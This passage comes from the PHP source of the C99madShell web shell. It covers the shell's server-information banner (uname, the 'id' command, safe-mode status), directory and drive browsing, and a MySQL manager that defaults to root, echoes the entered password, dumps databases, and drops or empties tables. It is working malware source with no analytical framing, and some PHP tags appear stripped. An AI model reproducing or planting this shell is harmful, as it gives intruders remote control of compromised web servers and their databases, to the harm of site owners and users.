  702.       else {$bool = strpos(" ".$r,$a["text"],1);}
  703.       if ($a["text_not"]) {$bool = !$bool;}
  704.       if ($bool) {$found[] = $d.$f; $found_f++;}
  705.      }
  706.      else {$found[] = $d.$f; $found_f++;}
  707.     }
  708.    }
  709.   }
  710.  }
  711.  closedir($h);
  712. }
  713. }
  714. if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
  715. //Sending headers
  716. @ob_start();
  717. @ob_implicit_flush(0);
  718. function onphpshutdown()
  719. {
  720.  global $gzipencode,$ft;
  721.  if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
  722.  {
  723.   $v = @ob_get_contents();
  724.   @ob_end_clean();
  725.   @ob_start("ob_gzHandler");
  726.   echo $v;
  727.   @ob_end_flush();
  728.  }
  729. }
  730. function c99shexit()
  731. {
  732.  onphpshutdown();
  733.  exit;
  734. }
  735. header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
  736. header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
  737. header("Cache-Control: no-store, no-cache, must-revalidate");
  738. header("Cache-Control: post-check=0, pre-check=0", FALSE);
  739. header("Pragma: no-cache");
  740. if (empty($tmpdir))
  741. {
  742.  $tmpdir = ini_get("upload_tmp_dir");
  743.  if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
  744. }
  745. $tmpdir = realpath($tmpdir);
  746. $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
  747. if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
  748. if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
  749. else {$tmpdir_logs = realpath($tmpdir_logs);}
  750. if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
  751. {
  752.  $safemode = TRUE;
  753.  $hsafemode = "<font color=red>ON (secure)</font>";
  754. }
  755. else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
  756. $v = @ini_get("open_basedir");
  757. if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
  758. else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
  759. $sort = htmlspecialchars($sort);
  760. if (empty($sort)) {$sort = $sort_default;}
  761. $sort[1] = strtolower($sort[1]);
  762. $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
  763. if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
  764. $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"#\" onclick=\"document.todo.act.value='phpinfo';document.todo.submit();\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
  765. @ini_set("highlight.bg",$highlight_bg); //FFFFFF
  766. @ini_set("highlight.comment",$highlight_comment); //#FF8000
  767. @ini_set("highlight.default",$highlight_default); //#0000BB
  768. @ini_set("highlight.html",$highlight_html); //#000000
  769. @ini_set("highlight.keyword",$highlight_keyword); //#007700
  770. @ini_set("highlight.string",$highlight_string); //#DD0000
  771. if (!is_array($actbox)) {$actbox = array();}
  772. $dspact = $act = htmlspecialchars($act);
  773. $disp_fullpath = $ls_arr = $notls = null;
  774. $ud = urlencode($d);
  775.  <html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST");   - c99madshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><form name='todo' method='POST'><input name='act' type='hidden' value=''><input name='grep' type='hidden' value=''><input name='fullhexdump' type='hidden' value=''><input name='base64' type='hidden' value=''><input name='nixpasswd' type='hidden' value=''><input name='pid' type='hidden' value=''><input name='c' type='hidden' value=''><input name='white' type='hidden' value=''><input name='sig' type='hidden' value=''><input name='processes_sort' type='hidden' value=''><input name='d' type='hidden' value=''><input name='sort' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''></form><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl;  "><font face="Verdana" size="5"><b>C99madShell v. <?php echo $shver;  </b></font></a><font face=Webdings size=6><b>!</b></font></p></center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE;  </b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1);  </b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();}  </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode;  </b></p><p align="left"><?php
  776. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  777. if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
  778. $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
  779. if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
  780. $d = str_replace("\\\\","\\",$d);
  781. $dispd = htmlspecialchars($d);
  782. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
  783. $i = 0;
  784. foreach($pd as $b)
  785. {
  786.  $t = "";
  787.  $j = 0;
  788.  foreach ($e as $r)
  789.  {
  790.   $t.= $r.DIRECTORY_SEPARATOR;
  791.   if ($j == $i) {break;}
  792.   $j++;
  793.  }
  794.  echo "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($t)."';document.todo.sort.value='".$sort."';document.todo.submit();\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
  795.  $i++;
  796. }
  797. echo "&nbsp;&nbsp;&nbsp;";
  798. if (is_writable($d))
  799. {
  800.  $wd = TRUE;
  801.  $wdt = "<font color=green>[ ok ]</font>";
  802.  echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
  803. }
  804. else
  805. {
  806.  $wd = FALSE;
  807.  $wdt = "<font color=red>[ Read-Only ]</font>";
  808.  echo "<b>".view_perms_color($d)."</b>";
  809. }
  810. if (is_callable("disk_free_space"))
  811. {
  812.  $free = disk_free_space($d);
  813.  $total = disk_total_space($d);
  814.  if ($free === FALSE) {$free = 0;}
  815.  if ($total === FALSE) {$total = 0;}
  816.  if ($free < 0) {$free = 0;}
  817.  if ($total < 0) {$total = 0;}
  818.  $used = $total-$free;
  819.  $free_percent = round(100/($total/$free),2);
  820.  echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>";
  821. }
  822. echo "<br>";
  823. $letters = "";
  824. if ($win)
  825. {
  826.  $v = explode("\\",$d);
  827.  $v = $v[0];
  828.  foreach (range("a","z") as $letter)
  829.  {
  830.   $bool = $isdiskette = in_array($letter,$safemode_diskettes);
  831.   if (!$bool) {$bool = is_dir($letter.":\\");}
  832.   if ($bool)
  833.   {
  834.    $letters .= "<a href=\"#\" onclick=\"document.todo.act.value='ls';document.todo.d.value='".urlencode($letter.":\\")."';document.todo.submit();\">[ ";
  835.    if ($letter.":" != $v) {$letters .= $letter;}
  836.    else {$letters .= "<font color=green>".$letter."</font>";}
  837.    $letters .= " ]</a> ";
  838.   }
  839.  }
  840.  if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";}
  841. }
  842. if (count($quicklaunch) > 0)
  843. {
  844.  foreach($quicklaunch as $item)
  845.  {
  846.   $item[1] = str_replace("%d",urlencode($d),$item[1]);
  847.   $item[1] = str_replace("%sort",$sort,$item[1]);
  848.   $v = realpath($d."..");
  849.   if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);}
  850.   $item[1] = str_replace("%upd",urlencode($v),$item[1]);
  851.  
  852.   echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;";
  853.  }
  854. }
  855. echo "</p></td></tr></table><br>";
  856. if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";}
  857. echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
  858. if ($act == "") {$act = $dspact = "ls";}
  859. if ($act == "sql")
  860. {
  861.  echo("<form name='sql' method='POST'><input name='act' type='hidden' value='sql'><input name='sql_tbl_insert_q' type='hidden' value=''><input name='sql_login' type='hidden' value=''><input name='kill' type='hidden' value=''><input name='sql_order' type='hidden' value=''><input name='sql_tbl_ls' type='hidden' value=''><input name='sql_tbl_le' type='hidden' value=''><input name='sql_tbl_act' type='hidden' value=''><input name='thistbl' type='hidden' value=''><input name='sql_passwd' type='hidden' value=''><input name='sql_server' type='hidden' value=''><input name='sql_port' type='hidden' value=''><input name='sql_db' type='hidden' value=''><input name='sql_act' type='hidden' value=''><input name='sql_tbl' type='hidden' value=''><input name='f' type='hidden' value=''><input name='ft' type='hidden' value=''><input name='sql_query' type='hidden' value=''></form>");
  862.  
  863.  if (isset($_POST['sql_login']))  {$sql_login=htmlspecialchars($_POST['sql_login']);}
  864.  if (isset($_POST['sql_passwd'])) {$sql_passwd=htmlspecialchars($_POST['sql_passwd']);}
  865.  if (isset($_POST['sql_server'])) {$sql_server=htmlspecialchars($_POST['sql_server']);}
  866.  if (isset($_POST['sql_port']))   {$sql_port=htmlspecialchars($_POST['sql_port']);}
  867.  if (isset($_POST['sql_db']))     {$sql_db=htmlspecialchars($_POST['sql_db']);}
  868.  if (isset($_POST['sql_act']))     {$sql_act=htmlspecialchars($_POST['sql_act']);}
  869.  if (isset($_POST['sql_tbl']))     {$sql_tbl=htmlspecialchars($_POST['sql_tbl']);}
  870.  if (isset($_POST['sql_tbl_act']))     {$sql_tbl_act=htmlspecialchars($_POST['sql_tbl_act']);}
  871.  if (isset($_POST['thistbl']))     {$thistbl=htmlspecialchars($_POST['thistbl']);}
  872.  if (isset($_POST['sql_order']))     {$sql_order=htmlspecialchars($_POST['sql_order']);}
  873.  if (isset($_POST['sql_tbl_ls']))     {$sql_tbl_ls=htmlspecialchars($_POST['sql_tbl_ls']);}
  874.  if (isset($_POST['sql_tbl_le']))     {$sql_tbl_le=htmlspecialchars($_POST['sql_tbl_le']);}
  875.  if (isset($_POST['sql_query']))     {$sql_query=htmlspecialchars($_POST['sql_query']);}
  876.  if (isset($_POST['sql_tbl_insert_q'])) {$sql_tbl_insert_q=urldecode(htmlspecialchars($_POST['sql_tbl_insert_q']));}
  877.  if (isset($_POST['sql_tbl_insert_functs'])) {$sql_tbl_insert_functs=htmlspecialchars($_POST['sql_tbl_insert_functs']);}
  878.  if (isset($_POST['sql_tbl_insert_radio'])) {$sql_tbl_insert_radio=htmlspecialchars($_POST['sql_tbl_insert_radio']);}
  879.  
  880.  
  881.  
  882.   <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php
  883. if ($sql_server)
  884.  {
  885.   $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
  886.   $err = mysql_smarterror();
  887.   @mysql_select_db($sql_db,$sql_sock);
  888.   if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();}
  889.  }
  890.  else {$sql_sock = FALSE;}
  891.  echo "<b>SQL Manager:</b><br>";
  892.  if (!$sql_sock)
  893.  {
  894.   if (!$sql_server) {echo "NO CONNECTION";}
  895.   else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
  896.  }
  897.  else
  898.  {
  899.   $sqlquicklaunch = array();
  900.   $sqlquicklaunch[] = array("Index","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
  901.   $sqlquicklaunch[] = array("Query","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();");
  902.   $sqlquicklaunch[] = array("Server-status","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='serverstatus';document.sql.submit();");
  903.   $sqlquicklaunch[] = array("Server variables","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='servervars';document.sql.submit();");
  904.   $sqlquicklaunch[] = array("Processes","#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.submit();");
  905.   $sqlquicklaunch[] = array("Logout","#\" onclick=\"document.sql.act.value='sql';document.sql.submit();");
  906.   echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
  907.   if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}}
  908.   echo "</center>";
  909.  }
  910.  echo "</td></tr><tr>";
  911.  if (!$sql_sock) { <td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl;  " method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php }
  912.  else
  913.  {
  914.   //Start left panel
  915.   if (!empty($sql_db))
  916.   {
  917.     <td width="25%" height="100%" valign="top"><a href="#" onclick="document.sql.act.value='sql';document.sql.sql_login.value='<?echo (htmlspecialchars($sql_login))  ';document.sql.sql_passwd.value='<?echo (htmlspecialchars($sql_passwd))  ';document.sql.sql_server.value='<?echo (htmlspecialchars($sql_server))  ';document.sql.sql_port.value='<?echo (htmlspecialchars($sql_port))  ';document.sql.submit();"><b>Home</b></a><hr size="1" noshade><?php
  918.    $result = mysql_list_tables($sql_db);
  919.    if (!$result) {echo mysql_smarterror();}
  920.    else
  921.    {
  922.     echo "---[ <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.submit();\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
  923.     $c = 0;
  924.     while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".htmlspecialchars($sql_db)."';document.sql.sql_tbl.value='".htmlspecialchars($row[0])."';document.sql.submit();\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
  925.     if (!$c) {echo "No tables found in database.";}
  926.    }
  927.   }
  928.   else
  929.   {
  930.     <td width="1" height="100" valign="top"><a href="<?php echo $_SERVER['PHP_SELF'];  "><b>Home</b></a><hr size="1" noshade><?php
  931.    $result = mysql_list_dbs($sql_sock);
  932.    if (!$result) {echo mysql_smarterror();}
  933.    else
  934.    {
  935.      <form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login);  "><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd);  "><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server);  "><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port);  "><select name="sql_db"><?php
  936.     $c = 0;
  937.     $dbs = "";
  938.     while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;}
  939.     echo "<option value=\"\">Databases (".$c.")</option>";
  940.     echo $dbs;
  941.    }
  942.     </select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php
  943.   }
  944.   //End left panel
  945.   echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
  946.   //Start center panel
  947.   $diplay = TRUE;
  948.   if ($sql_db)
  949.   {
  950.    if (!is_numeric($c)) {$c = 0;}
  951.    if ($c == 0) {$c = "no";}
  952.    echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>";
  953.    if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}}
  954.    echo "</b></center>";
  955.    $acts = array("","dump");
  956.    if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  957.    elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";}
  958.    elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
  959.    elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  960.    elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  961.    elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  962.    elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
  963.    elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
  964.    elseif ($sql_tbl_act == "insert")
  965.    {
  966.     if ($sql_tbl_insert_radio == 1)
  967.     {
  968.      $keys = "";
  969.      $akeys = array_keys($sql_tbl_insert);
  970.      foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
  971.      if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
  972.      $values = "";
  973.      $i = 0;
  974.      foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
  975.      if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
  976.      $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
  977.      $sql_act = "query";
  978.      $sql_tbl_act = "browse";
  979.     }
  980.     elseif ($sql_tbl_insert_radio == 2)
  981.     {
  982.      $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
  983.      $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
  984.      $result = mysql_query($sql_query) or print(mysql_smarterror());
  985.      $result = mysql_fetch_array($result, MYSQL_ASSOC);
  986.      $sql_act = "query";
  987.      $sql_tbl_act = "browse";
  988.     }
  989.    }
  990.    if ($sql_act == "query")
  991.    {
  992.     $sql_query = urldecode($sql_query);
  993.     echo "<hr size=\"1\" noshade>";
  994.     if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
  995.     if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
  996.     if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";}
  997.    }
  998.    if (in_array($sql_act,$acts))
  999.    {
  1000.      <table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db);  "><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login);  "><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd);  "><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server);  "><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port);  "><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db);  "><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login);  "><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd);  "><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server);  "><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port);  "><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql";  ">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
  1001.    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
  1002.     if ($sql_act == "newtbl")
  1003.     {
  1004.      echo "<b>";
  1005.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
  1006.     }
  1007.     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1008.    }
  1009.    elseif ($sql_act == "dump")
  1010.    {
  1011.     if (empty($submit))
  1012.     {
  1013.      $diplay = FALSE;
